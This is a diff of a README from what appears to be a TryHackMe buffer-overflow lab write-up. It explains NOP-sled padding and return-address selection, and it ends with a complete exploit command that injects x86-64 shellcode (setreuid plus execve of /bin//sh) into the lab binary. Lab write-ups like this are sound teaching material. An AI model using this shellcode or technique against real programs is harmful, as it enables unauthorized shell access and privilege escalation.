herffluff/thm-bof/README.md

 ```
 NL + 54 + NR = O
 ```
 Second, the left padding must be filled with `NOPS` instructions (hex code `\x90`).
 The "no operation' instruction instructs the processor to skip the hex code and move on the next one.
-Providing the lefft padding with `NOPS` gives us some manoeuver, so that the instruction pointer in memory lands in a region that will push the program towards the execution of the malicous code.
+Providing the left padding with `NOPS` gives us some manoeuver, so that the instruction pointer in memory lands in a region that will push the program towards the execution of the malicous code.
 If it lands on any `NOPS` instruction, it will be automatically forwarded towards the starting point of the malicious code.

 Third, the bytes in the right padding part should by any bite that is not corrupted (see [Tib3rius' room](https://tryhackme.com/room/bufferoverflowprep) for a walkthrough).
 For our practical purpose, the byte `\x41` (the letter A) works fine, but this may not be the case in all situations.

 Fourth, there should be padding on both the right and left side, although it is better to put more padding on the left than on the right.
-There is no exact amount, saved for the cardinal rule that it must respect the total length of the offset (with the malicous code).
+There is no exact amount, saved for the cardinal rule that the total length must equal the offset (with the malicous code).

 ## 4- Choose a memory adress within the left padding
-This will be used to point the instruction pointer towards the malicious code.
+This adress will be used to point the instruction pointer towards the malicious code.
 In practical situations, this could be done by trial and errors (or programmed within the malicious code).
 Here, we know from the previous sections where the function's memory starts.
 Consistent with the number of bytes for the left and right padding (numbers not shown), the example below uses "0x7fffffffe272".
 Then, the following command can be used to perform the exploit:
 ```
 ./buffer-overflow-2 $(python -c "print '\x90'*NL+'\x31\xff\x66\xbf\xea\x03\x6a\x71\x58\x48\x89\xfe\x0f\x05\x6a\x3b\x58\x48\x31\xd2\x49\xb8\x2f\x2f\x62\x69\x6e\x2f\x73\x68\x49\xc1\xe8\x08\x41\x50\x48\x89\xe7\x52\x57\x48\x89\xe6\x0f\x05\x6a\x3c\x58\x48\x31\xff\x0f\x05'  +'A'*NR+ '\x72\xe2\xff\xff\xff\x7f'")
 ```